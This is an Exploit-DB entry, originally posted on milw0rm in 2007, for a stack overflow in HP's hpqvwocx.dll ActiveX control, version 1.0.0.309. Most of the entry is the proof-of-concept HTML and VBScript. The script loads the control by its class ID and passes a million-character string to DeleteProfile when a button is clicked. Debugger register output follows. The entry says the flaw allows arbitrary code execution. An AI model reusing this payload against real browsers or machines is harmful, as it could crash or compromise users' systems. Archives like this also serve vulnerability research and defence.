Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309

vendor:

hpqvwocx.dll

by:

Goodfellas Security Research Team

N/A

CVSS

N/A

Stack Overflow

CWE

Product Name: hpqvwocx.dll

Affected Version From: 1.0.0.309

Affected Version To: 1.0.0.309

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Service Pack 2

2007

Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309

This proof of concept demonstrates a stack overflow vulnerability in the hpqvwocx.dll version 1.0.0.309. The vulnerability allows an attacker to execute arbitrary code by clicking a button that triggers the OuCh() function.

Mitigation:

Source

Exploit-DB raw data:

<html>

<head>

 <title>

  Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309

 </title>

</head>

 

<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>

Tested in Windows XP Service Pack 2<br>

Discovered by Goodfellas Security Research Team<br>

Url ->http://www.hp.com<br> author -> callAX<br>mail -> callax@shellcode.com.ar<br>

http://www.shellcode.com.ar / http://www.securenetworks.ch</h4>

 

<object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='pAF' ></object>

 

<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">

 

<script language="VBScript">

 

sub OuCh()

 

 Var_0 = String(1000000, "A")

 

 pAF.DeleteProfile Var_0

 

End Sub

 

 

</script>

 

</html>

 

<!--

 

Tested in OllyDBG 1.08b

 

TEST DWORD PTR DS:[ECX],EAX

 

EAX -> 000ED484

ECX -> 000425F4

EDX -> 00000000

EBX -> 00000000

EIP  -> 04B47B97

 

Sub DeleteProfile (

            ByVal Name  As String

)

 

-->

# milw0rm.com [2007-05-11]